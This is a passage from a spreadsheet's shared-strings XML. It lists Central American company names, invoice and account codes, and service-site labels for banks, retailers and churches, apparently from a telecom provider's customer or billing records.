    <t>TRANSPORTES Y LOGISTICA SA DE CV</t>
  </si>
  <si>
    <t>473800017T</t>
  </si>
  <si>
    <t>F4561226</t>
  </si>
  <si>
    <t>ID1024293SV</t>
  </si>
  <si>
    <t>HYM,S.A. DE C.V.</t>
  </si>
  <si>
    <t>564000006T</t>
  </si>
  <si>
    <t>F4561230</t>
  </si>
  <si>
    <t>449605ON</t>
  </si>
  <si>
    <t>928100001T</t>
  </si>
  <si>
    <t>F4561246</t>
  </si>
  <si>
    <t>1488552OH</t>
  </si>
  <si>
    <t>SERV PROFESIONALES DE COMUNIC SRL</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_LA_FLORESTA_XELA</t>
  </si>
  <si>
    <t>F4561262</t>
  </si>
  <si>
    <t>1706670OH</t>
  </si>
  <si>
    <t>F4561263</t>
  </si>
  <si>
    <t>F4561264</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_INTERNET_SANTA_LUCIA</t>
  </si>
  <si>
    <t>865100003T</t>
  </si>
  <si>
    <t>F4561269</t>
  </si>
  <si>
    <t>99900422T</t>
  </si>
  <si>
    <t>827700002T</t>
  </si>
  <si>
    <t>GRUPO AUTOCOM, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4561277</t>
  </si>
  <si>
    <t>664700020T</t>
  </si>
  <si>
    <t>F4561281</t>
  </si>
  <si>
    <t>680200001T</t>
  </si>
  <si>
    <t>CORPORACION DE OCCIDENTE PICA DE HULE</t>
  </si>
  <si>
    <t>F4561285</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0207</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ORATORIO_SANTA_ROSA</t>
  </si>
  <si>
    <t>F4561289</t>
  </si>
  <si>
    <t>939200002T</t>
  </si>
  <si>
    <t>TARJETAS CUSCATLAN S.A.</t>
  </si>
  <si>
    <t>919000001T</t>
  </si>
  <si>
    <t>VIVENDO S.A.</t>
  </si>
  <si>
    <t>894400001T</t>
  </si>
  <si>
    <t>LOGISTICS AND TRADING OF CENTRAL AMERICA LTCA, S.A.</t>
  </si>
  <si>
    <t>IP2026200SV</t>
  </si>
  <si>
    <t>758500482T</t>
  </si>
  <si>
    <t>608200001T</t>
  </si>
  <si>
    <t>CORPORACION CONSTRUFERRECAL SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>831800001T</t>
  </si>
  <si>
    <t>ONE SOLUCIONES</t>
  </si>
  <si>
    <t>F4561305</t>
  </si>
  <si>
    <t>17400168T</t>
  </si>
  <si>
    <t>5211913ON</t>
  </si>
  <si>
    <t>F4561318</t>
  </si>
  <si>
    <t>854340OH</t>
  </si>
  <si>
    <t>OH1000715593/TERMOENCOGIBLE DE HONDURAS S A -</t>
  </si>
  <si>
    <t>F4603278</t>
  </si>
  <si>
    <t>F4603287</t>
  </si>
  <si>
    <t>ID1027109SV</t>
  </si>
  <si>
    <t>E BUSINESS DISTRIBUTION DE EL SALVADOR, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4603306</t>
  </si>
  <si>
    <t>F4603307</t>
  </si>
  <si>
    <t>F4603327</t>
  </si>
  <si>
    <t>47502912T</t>
  </si>
  <si>
    <t>F4603334</t>
  </si>
  <si>
    <t>47503049T</t>
  </si>
  <si>
    <t>F4603340</t>
  </si>
  <si>
    <t>331000123T</t>
  </si>
  <si>
    <t>F4603345</t>
  </si>
  <si>
    <t>F4603348</t>
  </si>
  <si>
    <t>47503135T</t>
  </si>
  <si>
    <t>F4603357</t>
  </si>
  <si>
    <t>F4603366</t>
  </si>
  <si>
    <t>F4603371</t>
  </si>
  <si>
    <t>F4603378</t>
  </si>
  <si>
    <t>F4603382</t>
  </si>
  <si>
    <t>F4603385</t>
  </si>
  <si>
    <t>F4603386</t>
  </si>
  <si>
    <t>47503217T</t>
  </si>
  <si>
    <t>F4603393</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3795</t>
  </si>
  <si>
    <t>CC_GMG_CR_CODISA_VPN2</t>
  </si>
  <si>
    <t>F4603404</t>
  </si>
  <si>
    <t>F4566290</t>
  </si>
  <si>
    <t>90001904749T</t>
  </si>
  <si>
    <t>F4566298</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4381</t>
  </si>
  <si>
    <t>F4566308</t>
  </si>
  <si>
    <t>F4566310</t>
  </si>
  <si>
    <t>F4566317</t>
  </si>
  <si>
    <t>F4566323</t>
  </si>
  <si>
    <t>F4566337</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SAN_ANDRES_ITZAPA</t>
  </si>
  <si>
    <t>F4566344</t>
  </si>
  <si>
    <t>22342300SV</t>
  </si>
  <si>
    <t>SOLUCIONES CONTACTO S.A. DE C.V</t>
  </si>
  <si>
    <t>F4566352</t>
  </si>
  <si>
    <t>F4566359</t>
  </si>
  <si>
    <t>F4566366</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0397</t>
  </si>
  <si>
    <t>F4566368</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_471</t>
  </si>
  <si>
    <t>F4566374</t>
  </si>
  <si>
    <t>IDG000657SV</t>
  </si>
  <si>
    <t>8901246T</t>
  </si>
  <si>
    <t>F4566390</t>
  </si>
  <si>
    <t>608900002T</t>
  </si>
  <si>
    <t>807900424T</t>
  </si>
  <si>
    <t>333600039T</t>
  </si>
  <si>
    <t>F4566419</t>
  </si>
  <si>
    <t>F4566421</t>
  </si>
  <si>
    <t>F4566422</t>
  </si>
  <si>
    <t>DEFAULT</t>
  </si>
  <si>
    <t>344400203T</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_050</t>
  </si>
  <si>
    <t>453800001T</t>
  </si>
  <si>
    <t>COLEGIO CRISTIANO AMERICANO DE GUATEMALA</t>
  </si>
  <si>
    <t>23337600SV</t>
  </si>
  <si>
    <t>DIREYAS.A. DE C.V.</t>
  </si>
  <si>
    <t>F4623193</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004169</t>
  </si>
  <si>
    <t>F4623206</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_GUATEMALA</t>
  </si>
  <si>
    <t>F4623225</t>
  </si>
  <si>
    <t>360800020T</t>
  </si>
  <si>
    <t>90001909550T</t>
  </si>
  <si>
    <t>F4623257</t>
  </si>
  <si>
    <t>F4623259</t>
  </si>
  <si>
    <t>F4623262</t>
  </si>
  <si>
    <t>F4623266</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0057</t>
  </si>
  <si>
    <t>F4623268</t>
  </si>
  <si>
    <t>F4623269</t>
  </si>
  <si>
    <t>F4623270</t>
  </si>
  <si>
    <t>F4623276</t>
  </si>
  <si>
    <t>F4558830</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0206</t>
  </si>
  <si>
    <t>F4558832</t>
  </si>
  <si>
    <t>F4558842</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_GCC341133</t>
  </si>
  <si>
    <t>60900024T</t>
  </si>
  <si>
    <t>8901399T</t>
  </si>
  <si>
    <t>F4558919</t>
  </si>
  <si>
    <t>F4558920</t>
  </si>
  <si>
    <t>F4558947</t>
  </si>
  <si>
    <t>292900456T</t>
  </si>
  <si>
    <t>F4558982</t>
  </si>
  <si>
    <t>F4587850</t>
  </si>
  <si>
    <t>F4587852</t>
  </si>
  <si>
    <t>314400006T</t>
  </si>
  <si>
    <t>TARJETAZO S.A.</t>
  </si>
  <si>
    <t>F4587878</t>
  </si>
  <si>
    <t>F4587879</t>
  </si>
  <si>
    <t>F4587883</t>
  </si>
  <si>
    <t>F4587889</t>
  </si>
  <si>
    <t>208200054T</t>
  </si>
  <si>
    <t>90001908907T</t>
  </si>
  <si>
    <t>8900616T</t>
  </si>
  <si>
    <t>F4587898</t>
  </si>
  <si>
    <t>F4587909</t>
  </si>
  <si>
    <t>855900001T</t>
  </si>
  <si>
    <t>REGISTRO DE LA PROPIEDAD INTELECTUAL </t>
  </si>
  <si>
    <t>F4587918</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_AYUTLA</t>
  </si>
  <si>
    <t>F4587922</t>
  </si>
  <si>
    <t>F4587933</t>
  </si>
  <si>
    <t>F4587936</t>
  </si>
  <si>
    <t>90001910931T</t>
  </si>
  <si>
    <t>F4587953</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA216</t>
  </si>
  <si>
    <t>297400555T</t>
  </si>
  <si>
    <t>F4587969</t>
  </si>
  <si>
    <t>47504267T</t>
  </si>
  <si>
    <t>F4587977</t>
  </si>
  <si>
    <t>F4587982</t>
  </si>
  <si>
    <t>F4587984</t>
  </si>
  <si>
    <t>F4587985</t>
  </si>
  <si>
    <t>653200009T</t>
  </si>
  <si>
    <t>BANCO CITIBANK DE GUATEMALA, S.A,</t>
  </si>
  <si>
    <t>F4588001</t>
  </si>
  <si>
    <t>F4588004</t>
  </si>
  <si>
    <t>ID1204060SV</t>
  </si>
  <si>
    <t>FLORES VASQUEZ JORGE LUIS</t>
  </si>
  <si>
    <t>1726751OH</t>
  </si>
  <si>
    <t>F4620402</t>
  </si>
  <si>
    <t>F4620406</t>
  </si>
  <si>
    <t>64000069T</t>
  </si>
  <si>
    <t>65300030T</t>
  </si>
  <si>
    <t>F4620410</t>
  </si>
  <si>
    <t>937700001T</t>
  </si>
  <si>
    <t>AL CUBO,SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4620424</t>
  </si>
  <si>
    <t>F4620425</t>
  </si>
  <si>
    <t>F4620431</t>
  </si>
  <si>
    <t>F4620432</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_BARRIO_LAS_ROSAS</t>
  </si>
  <si>
    <t>F4620443</t>
  </si>
  <si>
    <t>MP230470006SSV</t>
  </si>
  <si>
    <t>IP2033103SV</t>
  </si>
  <si>
    <t>F4620464</t>
  </si>
  <si>
    <t>F4620469</t>
  </si>
  <si>
    <t>922900003T</t>
  </si>
  <si>
    <t>CONSTRUCTORA CACERES &amp; MAZARIEGOS, S.A.</t>
  </si>
  <si>
    <t>F4620492</t>
  </si>
  <si>
    <t>F4620494</t>
  </si>
  <si>
    <t>23610500SV</t>
  </si>
  <si>
    <t>617300001T</t>
  </si>
  <si>
    <t>CARTONES DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>1516234OH</t>
  </si>
  <si>
    <t>F4620516</t>
  </si>
  <si>
    <t>F4620524</t>
  </si>
  <si>
    <t>F4620525</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_MATAQUESCUINTLA_065</t>
  </si>
  <si>
    <t>417100001T</t>
  </si>
  <si>
    <t>SOLUCIONES DELICIOSAS</t>
  </si>
  <si>
    <t>F4620553</t>
  </si>
  <si>
    <t>F4584421</t>
  </si>
  <si>
    <t>1678145OH</t>
  </si>
  <si>
    <t>912448OH</t>
  </si>
  <si>
    <t>F4584431</t>
  </si>
  <si>
    <t>CONTR0001189707OC</t>
  </si>
  <si>
    <t>SABRITAS DE COSTAR ICA S.R.L._</t>
  </si>
  <si>
    <t>549000001T</t>
  </si>
  <si>
    <t>RADII LATIN AMERICAN S.A.</t>
  </si>
  <si>
    <t>F4584434</t>
  </si>
  <si>
    <t>F4584437</t>
  </si>
  <si>
    <t>1732538OH</t>
  </si>
  <si>
    <t>F4584439</t>
  </si>
  <si>
    <t>F4584441</t>
  </si>
  <si>
    <t>1011295OH</t>
  </si>
  <si>
    <t>55500011T</t>
  </si>
  <si>
    <t>EXPOGRANEL, S.A.</t>
  </si>
  <si>
    <t>5126661ON</t>
  </si>
  <si>
    <t>5556551ON</t>
  </si>
  <si>
    <t>ON0002964248</t>
  </si>
  <si>
    <t>F4584473</t>
  </si>
  <si>
    <t>ID1063013SV</t>
  </si>
  <si>
    <t>F4584482</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004067</t>
  </si>
  <si>
    <t>90001900365T</t>
  </si>
  <si>
    <t>F4584490</t>
  </si>
  <si>
    <t>1503030OH</t>
  </si>
  <si>
    <t>BANCO DE AMERICA CENTRAL HONDURAS</t>
  </si>
  <si>
    <t>F4584495</t>
  </si>
  <si>
    <t>F4584496</t>
  </si>
  <si>
    <t>F4584499</t>
  </si>
  <si>
    <t>F4584500</t>
  </si>
  <si>
    <t>ID1178020SV</t>
  </si>
  <si>
    <t>F4584502</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T52</t>
  </si>
  <si>
    <t>F4584512</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0085</t>
  </si>
  <si>
    <t>F4584515</t>
  </si>
  <si>
    <t>F4584518</t>
  </si>
  <si>
    <t>F4584520</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_4381</t>
  </si>
  <si>
    <t>F4584521</t>
  </si>
  <si>
    <t>F4584522</t>
  </si>
  <si>
    <t>F4584531</t>
  </si>
  <si>
    <t>ID1035040SV</t>
  </si>
  <si>
    <t>BANCO CUSCATLAN DE EL SALVADOR S.A.</t>
  </si>
  <si>
    <t>F4584539</t>
  </si>
  <si>
    <t>F4584548</t>
  </si>
  <si>
    <t>F4584550</t>
  </si>
  <si>
    <t>616321OH</t>
  </si>
  <si>
    <t>OH1000574580/ZETA GAS HONDURAS  ZETA GAS HONDURAS</t>
  </si>
  <si>
    <t>F4584569</t>
  </si>
  <si>
    <t>292900545T</t>
  </si>
  <si>
    <t>1356822OH</t>
  </si>
  <si>
    <t>F4551703</t>
  </si>
  <si>
    <t>F4551707</t>
  </si>
  <si>
    <t>F4551709</t>
  </si>
  <si>
    <t>F4551711</t>
  </si>
  <si>
    <t>F4551712</t>
  </si>
  <si>
    <t>ID1105087SV</t>
  </si>
  <si>
    <t>F4551723</t>
  </si>
  <si>
    <t>F4551725</t>
  </si>
  <si>
    <t>1621172OH</t>
  </si>
  <si>
    <t>1598708OH</t>
  </si>
  <si>
    <t>GRUPO AZUL</t>
  </si>
  <si>
    <t>F4551732</t>
  </si>
  <si>
    <t>21338300SV</t>
  </si>
  <si>
    <t>DIAGNOSTIKA CAPRIS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4551744</t>
  </si>
  <si>
    <t>25247600SV</t>
  </si>
  <si>
    <t>CASA AMA S.A.</t>
  </si>
  <si>
    <t>90001801189T</t>
  </si>
  <si>
    <t>F4551762</t>
  </si>
  <si>
    <t>F4551763</t>
  </si>
  <si>
    <t>758500481T</t>
  </si>
  <si>
    <t>F4551779</t>
  </si>
  <si>
    <t>F4551787</t>
  </si>
  <si>
    <t>F4551788</t>
  </si>
  <si>
    <t>856700001T</t>
  </si>
  <si>
    <t>ALL SPICE, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>429800002T</t>
  </si>
  <si>
    <t>CUENTAME S.A.</t>
  </si>
  <si>
    <t>F4551795</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3037</t>
  </si>
  <si>
    <t>25114600SV</t>
  </si>
  <si>
    <t>INVERSIONES RUSVAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4551804</t>
  </si>
  <si>
    <t>F4551805</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_METRO_PLAZA_JUTIAPA</t>
  </si>
  <si>
    <t>483200043T</t>
  </si>
  <si>
    <t>393500004T</t>
  </si>
  <si>
    <t>465300014T</t>
  </si>
  <si>
    <t>211200004T</t>
  </si>
  <si>
    <t>REFORESTADORA DE PALMAS DE EL PETEN, S.A.</t>
  </si>
  <si>
    <t>90001905082T</t>
  </si>
  <si>
    <t>25266300SV</t>
  </si>
  <si>
    <t>CANENGUEZ Y CANENGUEZ S.A. DE C.V.</t>
  </si>
  <si>
    <t>90001911182T</t>
  </si>
  <si>
    <t>F4561665</t>
  </si>
  <si>
    <t>F4561668</t>
  </si>
  <si>
    <t>F4561669</t>
  </si>
  <si>
    <t>326200008T</t>
  </si>
  <si>
    <t>GRUPO TELLAMO S.A.</t>
  </si>
  <si>
    <t>535200146T</t>
  </si>
  <si>
    <t>F4561683</t>
  </si>
  <si>
    <t>F4561685</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0085</t>
  </si>
  <si>
    <t>F4561686</t>
  </si>
  <si>
    <t>F4561689</t>
  </si>
  <si>
    <t>F4561699</t>
  </si>
  <si>
    <t>47502349T</t>
  </si>
  <si>
    <t>F4561712</t>
  </si>
  <si>
    <t>F4561714</t>
  </si>
  <si>
    <t>F4561721</t>
  </si>
  <si>
    <t>297401303T</t>
  </si>
  <si>
    <t>F4561726</t>
  </si>
  <si>
    <t>90001907992T</t>
  </si>
  <si>
    <t>F4561732</t>
  </si>
  <si>
    <t>F4561733</t>
  </si>
  <si>
    <t>F4561736</t>
  </si>
  <si>
    <t>F4561737</t>
  </si>
  <si>
    <t>ID1030043SV</t>
  </si>
  <si>
    <t>CORPORACION ORBITAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4561743</t>
  </si>
  <si>
    <t>F4561762</t>
  </si>
  <si>
    <t>F4561766</t>
  </si>
  <si>
    <t>F4561773</t>
  </si>
  <si>
    <t>F4603774</t>
  </si>
  <si>
    <t>604811OH</t>
  </si>
  <si>
    <t>F4603799</t>
  </si>
  <si>
    <t>F4603824</t>
  </si>
  <si>
    <t>F4603827</t>
  </si>
  <si>
    <t>F4603828</t>
  </si>
  <si>
    <t>F4603830</t>
  </si>
  <si>
    <t>F4603833</t>
  </si>
  <si>
    <t>849700001T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA P.J., S.A.</t>
  </si>
  <si>
    <t>F4603851</t>
  </si>
  <si>
    <t>455233ON</t>
  </si>
  <si>
    <t>F4603857</t>
  </si>
  <si>
    <t>758500102T</t>
  </si>
  <si>
    <t>23192900SV</t>
  </si>
  <si>
    <t>TRANSPORTES MARTINEZ S.A. DE C.V.</t>
  </si>
  <si>
    <t>863400059T</t>
  </si>
  <si>
    <t>IP2045135SV</t>
  </si>
  <si>
    <t>F4603884</t>
  </si>
  <si>
    <t>25115400SV</t>
  </si>
  <si>
    <t>F4603892</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4184</t>
  </si>
  <si>
    <t>IP2134127SV</t>
  </si>
  <si>
    <t>OTROS RED</t>
  </si>
  <si>
    <t>F4603915</t>
  </si>
  <si>
    <t>26656200SV</t>
  </si>
  <si>
    <t>GRUPO FLORES S.A DE C.V</t>
  </si>
  <si>
    <t>8901234T</t>
  </si>
  <si>
    <t>F4603935</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_NUEVA_SANTA_ROSA_077</t>
  </si>
  <si>
    <t>F4570180</t>
  </si>
  <si>
    <t>737900001T</t>
  </si>
  <si>
    <t>JOLUMA</t>
  </si>
  <si>
    <t>539600012T</t>
  </si>
  <si>
    <t>921500041T</t>
  </si>
  <si>
    <t>F4570192</t>
  </si>
  <si>
    <t>F4570195</t>
  </si>
  <si>
    <t>672400019T</t>
  </si>
  <si>
    <t>4647367ON</t>
  </si>
  <si>
    <t>ON0002667974/DELI STAR SA DELISTAR</t>
  </si>
  <si>
    <t>F4570200</t>
  </si>
  <si>
    <t>F4570201</t>
  </si>
  <si>
    <t>XT - ACTIVOS</t>
  </si>
  <si>
    <t>344400123T</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0102</t>
  </si>
  <si>
    <t>F4570205</t>
  </si>
  <si>
    <t>F4570206</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_15</t>
  </si>
  <si>
    <t>344400186T</t>
  </si>
  <si>
    <t>ID1028551SV</t>
  </si>
  <si>
    <t>863400396T</t>
  </si>
  <si>
    <t>427100010T</t>
  </si>
  <si>
    <t>F4570223</t>
  </si>
  <si>
    <t>292900641T</t>
  </si>
  <si>
    <t>F4570227</t>
  </si>
  <si>
    <t>F4570231</t>
  </si>
  <si>
    <t>1574747OH</t>
  </si>
  <si>
    <t>DAGAS</t>
  </si>
  <si>
    <t>F4570237</t>
  </si>
  <si>
    <t>F4570247</t>
  </si>
  <si>
    <t>758500250T</t>
  </si>
  <si>
    <t>F4570257</t>
  </si>
  <si>
    <t>F4570258</t>
  </si>
  <si>
    <t>F4570259</t>
  </si>
  <si>
    <t>1422717OH</t>
  </si>
  <si>
    <t>IP2030032SV</t>
  </si>
  <si>
    <t>F4570275</t>
  </si>
  <si>
    <t>F4570277</t>
  </si>
  <si>
    <t>ID1028312SV</t>
  </si>
  <si>
    <t>FONDO DE ACTIVIDADES ESPECIALES DE LA RADIO CADENA CUSCATLAN</t>
  </si>
  <si>
    <t>F4570281</t>
  </si>
  <si>
    <t>F4570282</t>
  </si>
  <si>
    <t>426100040T</t>
  </si>
  <si>
    <t>450585ON</t>
  </si>
  <si>
    <t>23490400SV</t>
  </si>
  <si>
    <t>GUERRERO INGENIEROS ASOCIADOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>321700001T</t>
  </si>
  <si>
    <t>581000005T</t>
  </si>
  <si>
    <t>581000006T</t>
  </si>
  <si>
    <t>CONTR0001452669OC</t>
  </si>
  <si>
    <t>4318945ON</t>
  </si>
  <si>
    <t>581000004T</t>
  </si>
  <si>
    <t>5498987ON</t>
  </si>
  <si>
    <t>1726557OH</t>
  </si>
  <si>
    <t>F4570329</t>
  </si>
  <si>
    <t>317500034T</t>
  </si>
  <si>
    <t>940100009T</t>
  </si>
  <si>
    <t>SANDWICHES &amp; RESTAURANTES,S.A.</t>
  </si>
  <si>
    <t>CC_BAC_GT_AV_PETAPA_Z12_INTERNET</t>
  </si>
  <si>
    <t>863400335T</t>
  </si>
  <si>
    <t>F4560521</t>
  </si>
  <si>
    <t>F4560523</t>
  </si>
  <si>
    <t>90001908719T</t>
  </si>
  <si>
    <t>F4560550</t>
  </si>
  <si>
    <t>IP2383062SV</t>
  </si>
  <si>
    <t>F4560555</t>
  </si>
  <si>
    <t>441300086T</t>
  </si>
  <si>
    <t>F4560564</t>
  </si>
  <si>
    <t>F4560567</t>
  </si>
  <si>
    <t>F4560570</t>
  </si>
  <si>
    <t>F4560571</t>
  </si>
  <si>
    <t>F4560574</t>
  </si>
  <si>
    <t>F4560575</t>
  </si>
  <si>
    <t>F4560587</t>
  </si>
  <si>
    <t>671900078T</t>
  </si>
  <si>
    <t>F4560593</t>
  </si>
  <si>
    <t>IP2041137SV</t>
  </si>
  <si>
    <t>F4560617</t>
  </si>
  <si>
    <t>F4560640</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0178</t>
  </si>
  <si>
    <t>636888OH</t>
  </si>
  <si>
    <t>F4560644</t>
  </si>
  <si>
    <t>F4560658</t>
  </si>
  <si>
    <t>F4592341</t>
  </si>
  <si>
    <t>F4592342</t>
  </si>
  <si>
    <t>F4592345</t>
  </si>
  <si>
    <t>F4592357</t>
  </si>
  <si>
    <t>F4592365</t>
  </si>
  <si>
    <t>F4592369</t>
  </si>
  <si>
    <t>F4592370</t>
  </si>
  <si>
    <t>8902103T</t>
  </si>
  <si>
    <t>F4592381</t>
  </si>
  <si>
    <t>F4592384</t>
  </si>
  <si>
    <t>F4592389</t>
  </si>
  <si>
    <t>F4592395</t>
  </si>
  <si>
    <t>F4592416</t>
  </si>
  <si>
    <t>1121612OH</t>
  </si>
  <si>
    <t>INVERSIONES MEGANET</t>
  </si>
  <si>
    <t>F4592435</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_Z5_AG43</t>
  </si>
  <si>
    <t>F4592442</t>
  </si>
  <si>
    <t>F4592451</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3123</t>
  </si>
  <si>
    <t>F4592459</t>
  </si>
  <si>
    <t>344400029T</t>
  </si>
  <si>
    <t>F4592488</t>
  </si>
  <si>
    <t>233400118T</t>
  </si>
  <si>
    <t>349900168T</t>
  </si>
  <si>
    <t>F4620570</t>
  </si>
  <si>
    <t>297400209T</t>
  </si>
  <si>
    <t>22685600SV</t>
  </si>
  <si>
    <t>F4620592</t>
  </si>
  <si>
    <t>F4620595</t>
  </si>
  <si>
    <t>F4620598</t>
  </si>
  <si>
    <t>344400769T</t>
  </si>
  <si>
    <t>F4620608</t>
  </si>
  <si>
    <t>F4620622</t>
  </si>
  <si>
    <t>F4620626</t>
  </si>
  <si>
    <t>F4620662</t>
  </si>
  <si>
    <t>21335600SV</t>
  </si>
  <si>
    <t>MATALLANA, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4620682</t>
  </si>
  <si>
    <t>47502820T</t>
  </si>
  <si>
    <t>F4620684</t>
  </si>
  <si>
    <t>F4620700</t>
  </si>
  <si>
    <t>F4620705</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004071</t>
  </si>
  <si>
    <t>F4620717</t>
  </si>
  <si>
    <t>F4620718</t>
  </si>
  <si>
    <t>90001904262T</t>
  </si>
  <si>
    <t>IP2134039SV</t>
  </si>
  <si>
    <t>F4587730</t>
  </si>
  <si>
    <t>F4587731</t>
  </si>
  <si>
    <t>F4587741</t>
  </si>
  <si>
    <t>822947OH</t>
  </si>
  <si>
    <t>OH1000575519/WATCH TOWER BIBLE AND TRACT SOCIETY  -</t>
  </si>
  <si>
    <t>F4587746</t>
  </si>
  <si>
    <t>F4587749</t>
  </si>
  <si>
    <t>F4587755</t>
  </si>
  <si>
    <t>F4587759</t>
  </si>
  <si>
    <t>F4587762</t>
  </si>
  <si>
    <t>F4587766</t>
  </si>
  <si>
    <t>F4587769</t>
  </si>
  <si>
    <t>90001908164T</t>
  </si>
  <si>
    <t>F4587774</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0410</t>
  </si>
  <si>
    <t>F4587775</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5058</t>
  </si>
  <si>
    <t>47504205T</t>
  </si>
  <si>
    <t>F4587785</t>
  </si>
  <si>
    <t>F4587786</t>
  </si>
  <si>
    <t>F4587789</t>
  </si>
  <si>
    <t>297401291T</t>
  </si>
  <si>
    <t>F4587806</t>
  </si>
  <si>
    <t>IP2135010SV</t>
  </si>
  <si>
    <t>F4587816</t>
  </si>
  <si>
    <t>F4587818</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3414</t>
  </si>
  <si>
    <t>22781010SV</t>
  </si>
  <si>
    <t>F4587833</t>
  </si>
  <si>
    <t>8900428T</t>
  </si>
  <si>
    <t>1742489OH</t>
  </si>
  <si>
    <t>F4587841</t>
  </si>
  <si>
    <t>297400971T</t>
  </si>
  <si>
    <t>F4587843</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0781</t>
  </si>
  <si>
    <t>F4552288</t>
  </si>
  <si>
    <t>551500023T</t>
  </si>
  <si>
    <t>ID1044025SV</t>
  </si>
  <si>
    <t>COMPLEJO EDUCATIVO CATOLICO FRAY MARTIN DE PORRES</t>
  </si>
  <si>
    <t>1422675OH</t>
  </si>
  <si>
    <t>327800007T</t>
  </si>
  <si>
    <t>ACCESORIOS GLOBALES S.A.</t>
  </si>
  <si>
    <t>IP2187046SV</t>
  </si>
  <si>
    <t>F4552326</t>
  </si>
  <si>
    <t>F4552328</t>
  </si>
  <si>
    <t>F4552329</t>
  </si>
  <si>
    <t>F4552336</t>
  </si>
  <si>
    <t>F4552342</t>
  </si>
  <si>
    <t>ID1278004SV</t>
  </si>
  <si>
    <t>927700007T</t>
  </si>
  <si>
    <t>25261600SV</t>
  </si>
  <si>
    <t>DROGUERIA FARMAVIDAS.A. DE C.V.</t>
  </si>
  <si>
    <t>29500012T</t>
  </si>
  <si>
    <t>F4552367</t>
  </si>
  <si>
    <t>F4552371</t>
  </si>
  <si>
    <t>453921ON</t>
  </si>
  <si>
    <t>24612600SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE CALUCO</t>
  </si>
  <si>
    <t>F4552383</t>
  </si>
  <si>
    <t>F4552395</t>
  </si>
  <si>
    <t>8900614T</t>
  </si>
  <si>
    <t>23257100SV</t>
  </si>
  <si>
    <t>CARIBEX WORLDWIDE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>IP2145150SV</t>
  </si>
  <si>
    <t>F4552416</t>
  </si>
  <si>
    <t>F4552419</t>
  </si>
  <si>
    <t>873000001T</t>
  </si>
  <si>
    <t>ZIBDI SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4563387</t>
  </si>
  <si>
    <t>F4563410</t>
  </si>
  <si>
    <t>F4563412</t>
  </si>
  <si>
    <t>F4563440</t>
  </si>
  <si>
    <t>F4563448</t>
  </si>
  <si>
    <t>F4563459</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_211</t>
  </si>
  <si>
    <t>F4563461</t>
  </si>
  <si>
    <t>F4563467</t>
  </si>
  <si>
    <t>F4563476</t>
  </si>
  <si>
    <t>F4563479</t>
  </si>
  <si>
    <t>F4563487</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_191</t>
  </si>
  <si>
    <t>F4563521</t>
  </si>
  <si>
    <t>40300081T</t>
  </si>
  <si>
    <t>F4604106</t>
  </si>
  <si>
    <t>ID1025127SV</t>
  </si>
  <si>
    <t xml:space="preserve">ALAS DORADAS, S.A. DE S.V.										</t>
  </si>
  <si>
    <t>331000122T</t>
  </si>
  <si>
    <t>90001909591T</t>
  </si>
  <si>
    <t>F4604148</t>
  </si>
  <si>
    <t>CC_GMG_SV_T028_PRADO_ARMENIA</t>
  </si>
  <si>
    <t>F4604150</t>
  </si>
  <si>
    <t>672100025T</t>
  </si>
  <si>
    <t>488800005T</t>
  </si>
  <si>
